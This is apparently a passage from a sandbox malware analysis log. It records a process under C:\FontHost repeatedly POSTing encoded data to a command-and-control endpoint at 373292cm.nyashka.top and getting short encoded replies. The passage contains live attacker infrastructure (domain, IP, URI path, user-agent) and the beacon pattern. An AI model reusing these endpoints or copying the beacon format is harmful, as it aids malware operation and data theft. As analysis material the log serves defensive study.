                              Aug 25, 2024 15:44:44.073824883 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:44.207602978 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              88 | 192.168.2.5 | 59945 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:44.338846922 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:44.694585085 CEST | 2504 | OUT | Data Raw: 5a 51 5c 50 54 43 54 5a 5b 5f 5a 51 59 52 58 51 57 5a 5d 59 57 58 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\PTCTZ[_ZQYRXQWZ]YWXSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^;#$#=7 !=$Y+)_)- #Z#Q#R($"0,&F$.Y/1
                              Aug 25, 2024 15:44:45.002876043 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:45.202310085 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              89 | 192.168.2.5 | 59946 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:45.325170994 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:45.678941011 CEST | 2500 | OUT | Data Raw: 5a 56 5c 56 54 43 51 5b 5b 5f 5a 51 59 57 58 5f 57 50 5d 5d 57 5a 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZV\VTCQ[[_ZQYWX_WP]]WZSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;!$]401X)[ (!\<.4"/,71R*)#Y8&F$.Y/
                              Aug 25, 2024 15:44:45.993058920 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:46.122764111 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              90 | 192.168.2.5 | 59947 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:46.598778963 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:46.944597960 CEST | 2504 | OUT | Data Raw: 5f 57 5c 5f 54 41 51 5b 5b 5f 5a 51 59 56 58 57 57 51 5d 53 57 5c 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _W\_TAQ[[_ZQYVXWWQ]SW\S]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.3?6-#7#:*=4Y(>6?+ +S7'+?#V5X,.&F$.Y/!


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              91 | 192.168.2.5 | 59948 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:47.185862064 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:47.538309097 CEST | 1828 | OUT | Data Raw: 5f 52 5c 52 51 47 54 59 5b 5f 5a 51 59 53 58 52 57 50 5d 58 57 5b 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _R\RQGTY[_ZQYSXRWP]XW[S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8;D6.' !)-(\?.>(>?X447V( 42,.&F$.Y/5
                              Aug 25, 2024 15:44:47.849723101 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:48.046835899 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0c 2a 25 2e 10 26 28 3b 0b 30 0d 07 0c 2b 3d 27 1d 2a 5b 39 1a 24 06 04 00 27 3e 2c 55 27 15 3e 05 3c 2d 2a 57 31 2f 3b 5b 3a 0e 2b 5d 0c 13 21 06 37 3a 07 03 31 2c 20 58 3e 28 3f 5b 35 2c 03 00 2b 39 21 16 3e 2c 3b 02 3c 29 23 5d 2b 3a 2d 0c 2c 28 07 15 2d 20 25 0c 20 04 2b 52 0d 11 24 54 28 03 25 53 28 2e 33 17 23 28 23 13 26 3d 3d 08 31 21 32 1f 24 07 20 58 25 32 1c 0d 33 31 25 55 25 5d 3d 06 31 3f 0f 1f 21 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %*%.&(;0+='*[9$'>,U'><-*W1/;[:+]!7:1, X>(?[5,+9!>,;<)#]+:-,(- % +R$T(%S(.3#(#&==1!2$ X%231%U%]=1?!"#T,"W3UV


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              92 | 192.168.2.5 | 59949 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:47.306085110 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:47.663379908 CEST | 2504 | OUT | Data Raw: 5f 51 59 53 54 40 51 5d 5b 5f 5a 51 59 50 58 57 57 5c 5d 5d 57 5c 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _QYST@Q][_ZQYPXWW\]]W\S_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,##- 76)=7+.%]+7? !Q*) V),&F$.Y/
                              Aug 25, 2024 15:44:47.970736027 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:48.169765949 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              93 | 192.168.2.5 | 59950 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:48.292726994 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:48.712258101 CEST | 2504 | OUT | Data Raw: 5a 52 5c 52 54 45 54 5e 5b 5f 5a 51 59 56 58 50 57 5a 5d 5a 57 5a 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZR\RTET^[_ZQYVXPWZ]ZWZS^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_..#(5# &).(?X9\(-#+P#W8V*)8 9\..&F$.Y/!
                              Aug 25, 2024 15:44:49.202616930 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:49.203802109 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:44:49.203888893 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              94 | 192.168.2.5 | 59951 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:49.338577032 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:49.694668055 CEST | 2504 | OUT | Data Raw: 5f 57 5c 5f 51 45 51 5a 5b 5f 5a 51 59 54 58 55 57 5b 5d 53 57 51 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _W\_QEQZ[_ZQYTXUW[]SWQSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,#<6=?7%Z)>/?._([?Z +Q4!(_ # 1;>&F$.Y/)
                              Aug 25, 2024 15:44:50.008923054 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:50.207356930 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              95 | 192.168.2.5 | 59952 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:50.338408947 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:50.703807116 CEST | 2504 | OUT | Data Raw: 5f 56 5c 54 54 45 54 58 5b 5f 5a 51 59 5f 58 53 57 59 5d 53 57 58 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\TTETX[_ZQY_XSWY]SWXSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^.08!.;# )>=$<.%]+[;4?+Q78V+: "3";>&F$.Y/
                              Aug 25, 2024 15:44:51.023118973 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:51.157840014 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              96 | 192.168.2.5 | 59953 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:51.318837881 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:51.726092100 CEST | 2504 | OUT | Data Raw: 5f 5d 5c 53 54 49 54 5c 5b 5f 5a 51 59 50 58 5e 57 50 5d 53 57 5b 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]\STIT\[_ZQYPX^WP]SW[SZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-. '!X4>?>.5<#Z+V <P<< 3=.>&F$.Y/
                              Aug 25, 2024 15:44:52.006839991 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:52.203919888 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              97 | 192.168.2.5 | 59954 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:52.344022989 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:52.694669962 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:53.019326925 CEST | 25 | IN | HTTP/1.1 100 Continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              98 | 192.168.2.5 | 59955 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:53.060080051 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1796
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:53.413372993 CEST | 1796 | OUT | Data Raw:
                              Aug 25, 2024 15:44:53.746339083 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:53.875607967 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              99 | 192.168.2.5 | 59956 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:53.199465990 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:53.553872108 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:53.868149996 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:54.000503063 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              100 | 192.168.2.5 | 59957 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:54.235459089 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:54.600898981 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:54.935722113 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:55.071682930 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              101 | 192.168.2.5 | 59958 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:55.199062109 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:55.554023027 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:55.867396116 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:55.998883009 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              102 | 192.168.2.5 | 59959 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:56.125399113 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:56.476012945 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:56.819982052 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:57.025274992 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:44:57.289798975 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              103 | 192.168.2.5 | 59960 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:57.294213057 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:57.647624016 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:57.959919930 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:58.090172052 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              104 | 192.168.2.5 | 59961 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:44:58.211956024 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:58.569530964 CEST | 2504 | OUT | Data Raw:
                              Aug 25, 2024 15:44:58.882006884 CEST | 25 | IN | HTTP/1.1 100 Continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
